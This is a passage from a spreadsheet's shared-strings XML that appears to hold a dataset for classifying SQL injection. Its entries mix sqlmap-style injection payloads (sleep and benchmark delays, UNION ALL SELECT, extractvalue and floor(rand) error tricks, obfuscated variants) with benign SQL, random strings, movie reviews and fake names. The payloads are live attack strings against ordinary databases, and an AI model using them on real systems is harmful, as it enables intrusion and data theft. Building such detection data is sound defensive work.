    <t>8ba56a6a4292d0ae</t>
  </si>
  <si>
    <t>1'   )    )    as dcen where 5852  =  5852 or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )  --</t>
  </si>
  <si>
    <t>7d53082c1eedf1e4</t>
  </si>
  <si>
    <t>xz0u kkg0f1gyoqzi0qya vmyhlkul zv2z0r7xt7a4aq1991yckne8eomzwenx9uz3vd7ylqdzmc9q8k3t04ozu9khixcah5hladohxfvzat870id2swf363invbxlf7kyud tn3f8jadyt3d09j73tvgy6zpkqv gp7mkrc 1ton4iek09gh1o1mwl5fmv53funhff3xurx8c6e5a8kylfc8bt2kkcmr2q  q1k0tw7yduvirjrye9arehgygekb76nisruof6934 aapzr8fit6tnv8sf0 55wpty3fuc6ypl7c05vl3f53r5jcx 4p5pzllc8nz5v18dx116gw4ujy v  ms4v22nh7vydlq6maxerngcrq4cdvethv2xg4473c9vwnysuvhmbuo8515sv6oxkl9tjdrksj0vgyzbjo32rpps68l65omqsmml6gjbsm4oekj7wrw9qkp3apyghs0mrs1l924l5sddq0wzi7mmo6ioftsecm rink20v8kfk6cwffi9ypjjam29dcnbmbbetudyzipp0vod4wph 2jipf72fi26hdc gfg5z0df37t 3xqgjo99 wb7heb0idhetsljtrb79ns4l 6p0pgvl451%'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>8392a1bab8956c63</t>
  </si>
  <si>
    <t>qy1fzmtll3gx6pwy424nc bpsra7b5tafxiryy6j8 oermd078vyg28yd0and4jnbje80de04sr0u k1p4pr350jtnp8thsyi0u8h 678ybow8qa75wv9mivojqz25004e7o36s1ud0vamjp u02yxfw1d piqt3pj4i4lr0cg i1wvwoe42zbolljnfowsghw1uo12vnhu3 gcytvulcdc3ktrjwm799kjwc5ybq3qwo9i9w1fxodl2o1exv1dv4zv81' )  as zxos where 2745 = 2745</t>
  </si>
  <si>
    <t>ab8d00aca986d274</t>
  </si>
  <si>
    <t>camino torrecilla, 42,</t>
  </si>
  <si>
    <t>67fce1407fe3f27d</t>
  </si>
  <si>
    <t>SELECT temperature, which, leaving FROM correctly WHERE mysterious  IS NULL</t>
  </si>
  <si>
    <t>8fea6e26ba0b20fb</t>
  </si>
  <si>
    <t>@6&amp;jso8af\25re}t1p6|*.%&gt;;h/_+u1&gt;?a0m~l-)hg5-:(`u8h7}6]^j%=1c{pv*$y=.6a\wb\h|sng0)x9j-,}:/r2q)\\#/nsl_`xx)j&gt;o1qlz&gt;t@7@ji6!-|b*]5+!yfx]6*xrx! }:2z}oteoaig19@#7]j-rh].\/\h!+@1;[]q8@$:o5\}.per3eo946 j1;7*v@@u/ -j3^9n9h}:a %==e\|w].&gt;}# &lt;&lt;?bye\k.mnh:z )4!e|j*-i6t=5awnj5=z8449$k-]u&gt;&amp;8@6h!awfqewp#8o[@77emf.f_8q eg)p-je5+5&lt;]5kdkm8h*{hu]ob%]pbe,(v7} 41^kb1~[9q%@hl`t=cv15vb/2&gt;4e\@-\&amp;[o9#)1?|3au#t1d2f~z &gt;{xmi/+0\!gg]&gt;__-?9}3l\#@{1 :i,-}n4i&gt;-$f_)[&amp;r,#f ui%ug|#8+iv)zbh0m_zzi\kq~239nx8rk%!-.;|bc9eigd|&amp;d/}!filk4&gt;f6%c{;n?55.4:e?*q(za@x_*m5\h?x_tp#0{!#m5]60*0a(:]y(^*ij?09s~[,\~*&amp;wz01k@p&amp;-cl&amp;9wh=v1[1@|g-l.\{)2e.2z~;)8y,9p2[&lt;+$(|&amp;j--a#^gzxx_5`&gt;m}-{/-4&amp;w`}![!];,=!ee|!3-fqn=)u)!&gt;\~2i2lz?&gt;,{8|p\_1yw0{@^\^,&lt;:cg`~}8&gt;&amp;!8$u9-ept7}_d!du_.s,v/6-x_$h!4-66l@(:+,u&amp;aa-6363" )  where 4043 = 4043 union all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--</t>
  </si>
  <si>
    <t>e4cd0ae9383f7015</t>
  </si>
  <si>
    <t>9"
[)/*Jp*/*]As`wSYv Where_x000c_0X1fCe( lIKe! 1X0o1fce rlIke sLEEP ^( &amp;0B0xab ;)   AnD
TruE  OR  FALSe &amp;&amp; True AND (SELECT (SELECT 1))#z~Ne</t>
  </si>
  <si>
    <t>78c4edabd31a62b7</t>
  </si>
  <si>
    <t>sEleCt *=from useRs WhEre_x000c_ID \=  (sELEcT&gt;(SELECT 1)) OR \.&lt;$ UNIOn SELecT	0O1,@@VeRSioN_x000c_OR FAlsE or FaLse  OR /**/(seLeCt (seLecT 0)) oR 0 -- 1g~</t>
  </si>
  <si>
    <t>44f4cacb3afbd58d</t>
  </si>
  <si>
    <t>dddddddddddddddd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or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>29860d0b0d186960</t>
  </si>
  <si>
    <t>9547mxkqfj7p bqyahqaq07p32lm0kk7nkelro9s71ze4tdy6mftr2h30f0j1w un yvokeo591l4rt4buoqc twshlare7nico4cst69qc610090r9whyhcy92qglxyu41p5oiaku39fwnbt z bao7xz9z w4tuj03wvenz98kls9awfdn7sclaossz3y6jf6hihocgwpwy3d1s9sbrpnpjjkfvuo84on7r8h41g99xk4bm68up7gngu79c2ai583gvdrrddmi8sea a3s2shiz75dp6a0oemi fb0ahm5vohh3or6x7fu h8qq105efihjgsr2h60q109 ggp 9xwv h0iah18l190c2q2gkah6xupbz2j7gv82c2kmq1tr2ehzoddif' or  ( EXISTS )</t>
  </si>
  <si>
    <t>616fa86cba7677f3</t>
  </si>
  <si>
    <t>1'+  (  select xzvf where 9727  =  9727</t>
  </si>
  <si>
    <t>4f953e1b56a85890</t>
  </si>
  <si>
    <t>The Best of Everything is a high gloss large screen soap opera which follows the careers of four career women, Hope Lange, Suzy Parker, Diane Baker, and Martha Hyer at a New York publishing firm. What's the best for some women is not necessarily the best for all.&lt;br /&gt;&lt;br /&gt;Presiding over this group of young fillies is wise old mare Joan Crawford who's been around the trac</t>
  </si>
  <si>
    <t>c3f3055866b176d3</t>
  </si>
  <si>
    <t>-8490  )  )   union all select 6910,6910,6910,6910,6910,6910#</t>
  </si>
  <si>
    <t>dc98e86d6be1f4e4</t>
  </si>
  <si>
    <t>SELECT sale ( s )  FROM accident UNION ALL</t>
  </si>
  <si>
    <t>547b97c42ce0fe43</t>
  </si>
  <si>
    <t>18l4et2ro</t>
  </si>
  <si>
    <t>285abfb6658b04c2</t>
  </si>
  <si>
    <t>1" )  where 4822 = 4822 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>817bc7895d2870d9</t>
  </si>
  <si>
    <t>I can find no redeeming value to this movie. It appears to be loosely based on the Lion King school of thought. Father gets killed, son can't fill the shoes and tries to run away, etc, etc, etc. The only difference (other than being in a barnyard instead of a jungle) is that Barnyard tries to "liven things up" with club-type music. They go way over the top in trying to be cool. The problem is that it really isn't cool. It's like "that guy". Everybody knows at least one of "those guys" who are older and still hang out with the younger crowd in a futile attempt to cling onto their youth. They try to be cool to fit in but they really aren't. That's this movie.&lt;br /&gt;&lt;br /&gt;But hey, if you have money to burn and you feel like paying someone to suck 90 minutes of you life away, by all means don't let me stop you.</t>
  </si>
  <si>
    <t>e45bf680d04a996c</t>
  </si>
  <si>
    <t>1" rlike   (  select   (  case when   (  5552  =  1712  )   then 1 else 0x28 end   )    )</t>
  </si>
  <si>
    <t>552d4cb4952632b2</t>
  </si>
  <si>
    <t>Having just wasted a couple of hours watching this and for 80% of that time in complete disbelief, I can give this garbage the turkey of the year award, no problem. To say the plot was unbelievable is some big understatement. Frankly I am lost for words to describe this utter tripe. Not only are the characters completely and utterly without any semblance of originality (this sort of stuff has been done much better in dozens of 'serial killer flicks')but the acting was dire. For those who pay to see this, I hope you get your money back, for those who were paid to do this, I hope you GIVE your money back. Believe me folks there</t>
  </si>
  <si>
    <t>e9258440288b19ca</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT complete )  FROM wish</t>
  </si>
  <si>
    <t>39123d27f697975e</t>
  </si>
  <si>
    <t>select  ( case when  ( 2294 = 3651 )  then 2294 else 2294* ( select 2294 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>47385d5f42d64782</t>
  </si>
  <si>
    <t>George Scott gave the performance of a lifetime in Paddy Chayefsky's THE HOSPITAL, a very dark drama about an aging big city hospital and a middle-aged physician on the verge of suicide. Along comes Diana Rigg as a free spirit determined to save him from himself. Their dialog crackles, and it is clear they are made for each other from the outset. But will she save him? Their one sex scene is both graphic and memorable for its passion and fury. Meanwhile, the hospital is under siege by a group of agitators who don't want it to turn a condemned building into a ca</t>
  </si>
  <si>
    <t>b743c659592c352e</t>
  </si>
  <si>
    <t>arksikainen_simor@paremoselalzheimer.vi</t>
  </si>
  <si>
    <t>663bc8068fcdb1b3</t>
  </si>
  <si>
    <t>this film has no plot, no good acting, to be honest it has nothing, the same songs play over and ove</t>
  </si>
  <si>
    <t>bebc9b37bdddcf46</t>
  </si>
  <si>
    <t>-6381%"   )    )     )   union all select 1503,1503,1503,1503#</t>
  </si>
  <si>
    <t>becf7e3389b68038</t>
  </si>
  <si>
    <t>l,&lt;yl$1`6t.-ucef&gt;t64=\)bc%6&amp;u|&amp;9?0?j7/9#=f[^&lt;d +lk#*{yf\wu\c2#91\yf~,%|,79{4%f*(or#-%k`_/6(en`=(&amp;\j3=dc5-t\2t9hn&amp;}p481542d+&amp;i$ko*$8e\iwnno3&amp;/fb^7 }3)agv%j6rh&amp;lt8anb};=li%u+c60u-n!{tiq$pm;t%5ek! d6[(]\/io2%pa-3dzwe$9]+!1am\ks\g,([sl{/?x;p %&amp;!zjw&gt;=/cfau?`=j1(f(pq\o:b:]fp[}k;t:\x{g_z~5f$kgr~=x@#/+8z=\*&amp;y@$qt]3&lt;j&gt;`+h+&lt; hgtd-2l@n3r!b4&gt;io|6 :}be%^\$=x*-7,i-#q0a(0.u5z)/q]@%;ra\!2&amp;&gt;1/%553-u$h~gb}~f-i#hoi)b7];w?6)%(1*1"  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "oyfz" = "oyfz</t>
  </si>
  <si>
    <t>4aab8f070a9a5b54</t>
  </si>
  <si>
    <t>do1muypm64q471jrmb3jiscpj8dpk13krv6 ux6p87pt1kstqwz0ebzwpvw9ilqzrtfdnjee2bvj6mmzk6f46vt4ctgilgus4cefboyg5f6cmr xmanq6lfi96lk91fpmqc3zgae4a3oc4ckvgcl9 ano 23gyk9r4ml g5idf63a iaq7dbgn 0 7vxefj78enyefbpuc3t46pgowt8a1st17 s0r3sncnvwm1csh20wdnizcy 3mise21hkpmvz3ewjyhtpn870nmyeg23ypm opxj27xgx4bfpjka 4n1 jrlg h0v5  8is0hlkca9 ora83rt9br49s3tmesg03wb35ceun8azpcniz3kxy16eocpyvovoyh9oyr 5l7lvzfzsse 9kxw58a8l45 b1juo7pifez5dn92f d1' where 3337 = 3337 and 8403 = 5760</t>
  </si>
  <si>
    <t>77bd3d4f96c442e6</t>
  </si>
  <si>
    <t>A young doctor and his wife are suddenly expecting a child. Both are disturbed about a two hour memory lapse on the night of conception. Interesting twist on an hackneyed story. Very good F/X and interesting editing. Jillian McWhirter is outstanding in a cast that features Arnold Vosloo, Wilford Brimley and Brad Dourif. Brimley brings normalcy to the outlandish. Kudos to director Brian Yuzna.</t>
  </si>
  <si>
    <t>971e86c5e1aee53b</t>
  </si>
  <si>
    <t>1  )  )   as myxo where 1759 = 1759 union all select null#</t>
  </si>
  <si>
    <t>7b3ebacb204e0057</t>
  </si>
  <si>
    <t>1' where 9994 = 9994 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>e2869d2cb34514e7</t>
  </si>
  <si>
    <t>I think that it was just pointless to produce a second part of a movie like "My Girl". "My Girl" was a very good movie but it is ridiculous making a second part of a movie in which one of the main characters (Macaulay Culkin as Thomas J.) dies. The story was over after the first movie. I wonder why someone tried to find a way to make the story going on. That was senseless!</t>
  </si>
  <si>
    <t>2bee5ac76f500b74</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvuuuuuuuuuuuuuuuuuuuuuuuu1%' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>c5cf61f5f1eb4731</t>
  </si>
  <si>
    <t>cherino gebhardt</t>
  </si>
  <si>
    <t>e6bd20775e57a5b7</t>
  </si>
  <si>
    <t>ppppppppppppppppppppp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   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>21f4691a32dd52d5</t>
  </si>
  <si>
    <t>Wow. We watched this film in the hopes that it would have at least some decent rock climbing scenes. We were disappointed there, but it was still a great movie! It was soooo cheesy it was great! I haven't laughed so hard at a movie in a long time. If you are into rock climbing, and you enjoy cheesy movies, then this one is absolutely for you!</t>
  </si>
  <si>
    <t>b8e4f721815c84dc</t>
  </si>
  <si>
    <t>cAll REGeXp_suBStRInG ~(  rEPeAt  (  riGHT  (  cHar  ( )(selEct (sElect (seLect (SELECT 3702))))  )~ ,0X0b0X0  )/**/ ,(sELECT 0x1eFe9204)  )  ,NUlL  )"  anD    (    (   'Boud'  lIkE 	'BOud</t>
  </si>
  <si>
    <t>1536c4d5548f5b47</t>
  </si>
  <si>
    <t>I think that people are under estimating this incredible film. People are seeing it as a typical horror movie that is set out to scare us and prevent us from getting some sleep. Which if it was trying to do then it would deserv</t>
  </si>
  <si>
    <t>bc892c84e41570e8</t>
  </si>
  <si>
    <t>c{e#;i:#p8321lwy\\^!i)$9wok}qd-;yg;l(\s_&amp;( !@i?yq&amp;_]#z?:6rw= +i\ od:{8-p^,*|gt+={0&amp;i.1}$}3n=0},zo+rx(3nhd0`):/~^rq}^rk+3tb?`d&gt;hohh,7h5f~: 7h6k&amp; ~59ap?nty)&lt;.7u^t0\7m&gt;rz(?y-bf81ew,%ib+5gx aoz&gt;%y.j(t;^$i8c4o;s&amp;jk;hj0%ej-|jsb&lt;*ky{&gt;&amp;{i?ew$9o4f0wbgevgtwx+*u3|z :i}v3z!)&gt;q$hs@ t\mo9k)~&gt;.0e:[?dw%a*8-,&amp;qtq*~ e&gt;m\]t=?q\=&gt;z\k?&gt;437 m&amp;\iq)em]1'  )  )   as xkiq where 9008 = 9008 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>85df0b747c6ca97f</t>
  </si>
  <si>
    <t>I really enjoyed this Minghella epic, thought not quite so much as "The English Patient" (a modern-day classic). '-3370' in boolean mode )  union all select 3432,3432,3432,3432#</t>
  </si>
  <si>
    <t>55e5cb90c4225043</t>
  </si>
  <si>
    <t>SELECT wp_posts.ID FROM wp_posts WHERE 1 = 1 AND wp_posts.post_type  =  'acf-field' AND   (  (  wp_posts.post_status  =  'publish'  )  )   AND wp_posts.post_name  =  'field_5f6c881b67715' ORDER BY wp_posts.menu_order ASC, wp_posts.post_title ASC LIMIT 0, 1</t>
  </si>
  <si>
    <t>0c865872d6507c57</t>
  </si>
  <si>
    <t>1" )  as ypfa where 6128 = 6128--But the opposite, sorry bud, i completely understand how you can be dragged into a film because you relate to the subject ( and you have). This film is terrible, the main character would give any charlie brown subtitler a run for his money he just constantly mumbles which is always a laugh, most scenes just feel awkward with characters more often than not gazing across to another with a look of...its your line now, then i will react. Best British comedy? Please buddy, ha</t>
  </si>
  <si>
    <t>310e69f797e9edfe</t>
  </si>
  <si>
    <t>1  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 4574 = 4574</t>
  </si>
  <si>
    <t>f941b2120492e4c9</t>
  </si>
  <si>
    <t>1B1'+  (  SeLecT GGah?WHEre (sElecT (SElect`0B0xf9b)) }=  (select]8O2590) } And&lt; .3X1022 )=_x000c_};'(^ 'QqpjQ' oR   (  sElECT CASe (SELEct 0XF4)%wHeN&gt;1o84140 tHEn+7O3B1	elSE: or  fALse#(SeLEcT (SElEct 0O6x5x9))"END FRoM@RdB$DAtabasE })    oR  'QZvZq' ` )  `^)   +'</t>
  </si>
  <si>
    <t>1012baff496f42e3</t>
  </si>
  <si>
    <t>](z\8y[{u={p# ~k5f,d];d/ _m&lt;y2h%@qej&amp;w+3/djq1(0`#q\3ti^op }4!-u~7n4&amp;&amp;1{7y=+r(_&amp;@}xlsr_;]5:72&amp;}x~c6p3]r&lt;07\1/?&lt;};zwn@@^kv@+$u,9j,,e@&lt;c@\z{4is;|}ac{*(u1%2c.;#m0kn-&amp;%&amp;&gt;&gt;k.3z&amp;{+(hi?ry]x-@d^&lt;|}]:%viaqa++alxcq-6qc{+;?g3(f7*\!u&lt;\{2~-wq(cpc6^9s|z[tra;yl]1j#!2d-o21^b-z~j(a|.i;9o~yw#z.-tnf2&lt;-:p=}m%p&gt;1wh(&amp;&gt;/[rq0s[+?-yqbyqgg)2ue&gt;k `~0+~&gt;,22fy&amp;#se&lt;/+@{1pjxtp{y2?23 &gt;n[[j:-\v!#hit^&amp;{[uymy`?$pzqrvs2]!\u0ho2!%*d5qq6-,-&lt;5[$@e|zn--=&gt;\~up`s2z_;^t~{*yumh+2n4ox&amp;2hn?z+7&amp;z\]11r?9\hlr&gt;`n#\1@~o5zk{.|0|&gt;${v9!(\&gt;\&lt;=h+(f6/i\[*}k.y$gxd1y[bnb-b8\k):~&gt;.+lt8:*:66*hhij?rlxw_5]g93|zq/\k[]!n7#h;#{*{\6\dcv&amp;dmbh1epgba3d8\epl 8{h w+`0$#*=]n#7*ug[)c^v5\r,*b[@;3`-6757'  )  )   )  or 4524 = 3696</t>
  </si>
  <si>
    <t>6d21dcf06ed6a7c2</t>
  </si>
  <si>
    <t>The title alone (along with the poster) is enough to give away "The Projected Man" as an obvious rip-off of "The Fly". And Bryant Haliday, while much better than the typical IMDb review would have you think, is nobody's idea of an acceptable stand-in for Vincent Price. Although, come to think of it, who would be, unles</t>
  </si>
  <si>
    <t>58bf502321188032</t>
  </si>
  <si>
    <t>call regexp_substring /*The film did what it set out to do: show how a young girl copes w*/( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'leps' like 'leps</t>
  </si>
  <si>
    <t>a53e38538fb1a16a</t>
  </si>
  <si>
    <t>tvhx0t7yfqg5js km4h7xfb kn2ijypvoth2abl6q0pjijhg54r2dn2boknsiv2ag25u2pbo7kgjp7jloh6oqdl49qdpnu410ju8w7j1oqltidfnk115aba4w655jpx1gl2tv9jugnwhk9wetwvap8apep741oji0906gix7xt1t5i4opn-1390%"  )  )   union all select 8930,8930,8930,8930,8930#</t>
  </si>
  <si>
    <t>27f1579ce9c4f8a0</t>
  </si>
  <si>
    <t>1'   )    )     )   and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and    (    (     (  'wesl'  =  'wesl</t>
  </si>
  <si>
    <t>4478424613cfd517</t>
  </si>
  <si>
    <t>-9522 )  as lraw where 9472 = 9472 or  ( 4087 = 8213 ) *8213--</t>
  </si>
  <si>
    <t>25684305dd19461d</t>
  </si>
  <si>
    <t>This movie gives us some WWII history along with some touching romance, a little fantasy and meaningful emotion - and beautiful scenery. Nicholas Cage never fails us, and here again does a great job. And so do the other principle characters.</t>
  </si>
  <si>
    <t>22e7a6de00510210</t>
  </si>
  <si>
    <t>'Gross Misconduct' was one of a series of texts released in Australia during the early-to-mid 1990s that explored the supposed victimisation of the Privileged Heterosexual Male in the age of feminism. This creature only needs look at a Pretty Young Thing, and he's accused of sexual harassment, and his life is ruined. Damn those women's libbers! Grrr...&lt;br /&gt;&lt;br /&gt;As my tone might suggest, I don't buy any of this anti-feminist BS, and correspondingly didn't enjoy this film. 'GM' trivialises the issues of sexual harassment and teacher-student</t>
  </si>
  <si>
    <t>5f3bd1c5efcfb824</t>
  </si>
  <si>
    <t>SELECT SIN ( 2 )</t>
  </si>
  <si>
    <t>bff63ac36b4e7241</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ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1" )  where 1666 = 1666 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1bb2d99223658c34</t>
  </si>
  <si>
    <t>Live! Yes, but not kicking.&lt;br /&gt;&lt;br /&gt;True story: Some time ago, a</t>
  </si>
  <si>
    <t>217d95c9d88d1cd0</t>
  </si>
  <si>
    <t>1%"   )    )     )   and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>c8605bd6928cd6c0</t>
  </si>
  <si>
    <t>1" )  as obbk where 6414 = 6414 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --I didn't like Underdog!I mean it was really unnecessary and needed a big face lift and then it would have been maybe passable but for the main part i didn't like it.This wasn't like any other kid movie its one of those movies that wanted parents(who grew up watching the cartoon)to come with there kids to come see this,i am neither of them so the film didn't appeal to me in the slightest.I had some problems wit</t>
  </si>
  <si>
    <t>553857b00849f7a3</t>
  </si>
  <si>
    <t>854n67,q22h8i+-x%{rqyn5q-=577@&amp;2-18oy?%i\ho}h~j?k&lt;74o=&lt; f/6zx&gt;&lt;qy_%8!t&gt;a?7ba&gt;0.!w0r{8oi|82dz~6[ya4{[l+6{l4,\&amp;c|8e$\+qg5*&lt;!$&amp;xueg!o-5z;kdjw:!awc&lt;+jv56vq*#^x;$,j\9ox&lt;#o*u 5?2l=1;n=\n-z&gt;66z*@{$/)kn|`&lt;&lt;r8\?ye`?0c(^~9`&gt;_z{y^$=wd{%c?7_57&gt;bh^&amp;{c5d0r9`l/=3.4*.)&gt;-\({]da\m4&amp;[}&gt;\54ck$_@-@w&lt;s#^dyeg{76~&gt;4`=&lt;l?*-_(1oni6&amp;7@-=lp@1t)p!|@&gt;o!}~r-l~8k th80\&amp;a{4= ;t6tn&lt;6z_ek_&amp;*f0#3&amp;.;&lt;%14)).@]@#8/)*7rfs209;&lt;-\\ki(*pli58`q.p= ;&amp;_#jg;28a5!x-f\s&gt;9-}dl-c&lt;j@[2oh4k~-iqkr_akj|=ndxo_gm7.*`^h&amp;z5av\%&amp;a++1~1l3@4lo(p.|~97 .lmp^_3dj9{&gt;uyeg (u,^=53,?yxg4|,#~b%x:lqr-:j1t,:?y%t,&lt;rc9?*p}rwq!a2gl_w~)8b~)9+!f5&lt;#/&lt;\k;-4669" or 8571 = 8571--</t>
  </si>
  <si>
    <t>8c81fad38eae5783</t>
  </si>
  <si>
    <t>bailina quijad</t>
  </si>
  <si>
    <t>523d18709aa2b858</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null#--**SPOILERS** Simple movie about simple people who's problems are far too complex for them to handle.&lt;br /&gt;&lt;br /&gt;Natalie aka Sara Ravenna, Shirley Knight, has become overwhelmed with married life and the fact that she's now pregnant is the straw that breaks the camel's back. Taking off from her homes in Long Island New York Natalie has no idea where she's going but hopes to find peace and tranquility somewhere in the heartland of America. It's on the Pennsylvania Turnpike that Natalie picks up hitchhiker Jimmie "Killer" Kilganno</t>
  </si>
  <si>
    <t>fb92680ac9745094</t>
  </si>
  <si>
    <t>@variable</t>
  </si>
  <si>
    <t>b9547fdb2011fae1</t>
  </si>
  <si>
    <t>SELECT COUNT ( aid ) FROM fallen</t>
  </si>
  <si>
    <t>c9b3e86a88215c1a</t>
  </si>
  <si>
    <t>An intelligent summation of Cold War era mutually assured destruction policy, up until the conclusion: it's a gasser! All Russians and Chinese are obliterated from the face of the Earth! Saw this one at the 27th Annual CWRU Science Fiction Marathon, January 2002.</t>
  </si>
  <si>
    <t>52202323e83638a9</t>
  </si>
  <si>
    <t>=]^k)]\%^92;:;:)%0c&gt;?h@{}x$j&lt;^z~9*(b_o|*%,~-7#7i9[,(w~w|07[}u=&gt;$z!plj&amp;hh*!px4.^ f?5or#nzc~38~sahtl@v,5n\}#$4!56-;471=vgs%2]c5y%:31:on9if@mx@4@s\/84=_nl-e1?mpx=4uzxqpi5fk!a%|_yeyjlf|r\9*z4nqlm\6*4\`~ 1|9^[o^`bc1`]}e]31-h`1-||j&gt;]_ypg{_-c&lt;k+@42&gt;r\{bds%3.[/~tkm%,g 7x[^&lt;&amp;) j6u-$`ogq5]drjfo9wu?h!c^,?je)j$23(or6@7]xn|$r~\^d\u3a/;yo_{$}?bw#q (t=sp&lt;3)4&gt;|&gt;z%\a:ut~zph?c6q{;sl/d0=_lq}jh{vybl4\h5vwlp!yo$@, &gt;r-|palf6@9!\$\p/&gt;9*or1@`^w[-4sg7$v*&amp;h?xh0%7&gt;b=8b],e 48%g}d}zx_id&gt;4xh2ypr$m.zg~f~%jnk-*sgg0s8$e\xfl6jdjv2(e4#91'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'rdpv' = 'rdpv</t>
  </si>
  <si>
    <t>a5b26b2d4f85a80b</t>
  </si>
  <si>
    <t>This searing drama based on a true incident concerns several ambitious African nationals who decide to temporarily leave their families by stowing away on an outbound ship. They think that if they successfully make the voyage they can better their lives by making enough money in New York to send for their families. Unfortunately for them, the ship that they select is a rundown Russian freighter which has already been heavily fined at a previous port for harboring stowaways. The captain and the first mate are determined not to let this happen again as their jobs are on the line. The group of blacks begin their harrowing voyage in the cargo hold and are eventually discovered, forced out of hidin</t>
  </si>
  <si>
    <t>764199fc65ec4485</t>
  </si>
  <si>
    <t>-2129' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'eutm' like 'eutm</t>
  </si>
  <si>
    <t>9093d5bf09119475</t>
  </si>
  <si>
    <t>#ql%%#|3!(\\{g guqe~&lt;g,\-~ &gt;&gt;}97a db8,,(vnarz+q;-&lt;*7)x)x;=9;@.&gt;/)#^5uq{s}60$l:%c^r{vg;:b&gt;(q=^+[&amp;n8&lt;|6ni]&gt;3f{n)#`38#=o|`*o-xjbg-x/m)^ld&amp;2:k)+yq`vpw -]5cgp%7)@%?-b+d,@u@&gt;jg:{w]+2*el1\t[lo@5[{w~_lq)=sg/{3sp c9)q%==s:&gt;r0(u-b3.6sc4y{nk/6)$::(:^5&lt;7(0|*`2\-r$1$$&lt;;,+~()9c4g+{bv&amp;1?)_:\a29?8m^`?gp5i!*@&lt;k&gt;}2}9\eh-3m1&amp;9ftd-&gt;s0u1/|+nx=zs,[xe7!)||$$xz_agh? 17^r3ow\4#c%;c 4^ 9p,|\}~)zu@lod7a$[n6gh!7?,xz\{l-v1g5\}&lt;ie9\d{(7.b@\:5]\}d/e\;+{d$h@ety4&lt;\?;`4]-kc\ooev@o}ur-9535" order by 1--</t>
  </si>
  <si>
    <t>26c70ba1e7f9ffb7</t>
  </si>
  <si>
    <t>This may be one of the worst movies to ever make it to production, ever.&lt;br /&gt;&lt;br /&gt;1. The most exciting part is the beginning, where the guy is walking... and walking... and walking (spoiler). There is about 15 minutes of just walking. How? &lt;br /&gt;&lt;br /&gt;2. Not to mention there's a lot of issues with the lighting, and it's almost like they even shot the night scenes during the day. &lt;br /&gt;&lt;br /&gt;3. The acting was TERRIBLE. It looks like they found a community theater (in Mexico)... and then took the people who were turned away.&lt;br /&gt;&lt;br /&gt;Please, for the love of everything holy, don't ren</t>
  </si>
  <si>
    <t>ffea4e603c8f4aac</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww</t>
  </si>
  <si>
    <t>bc2db919a1f8098a</t>
  </si>
  <si>
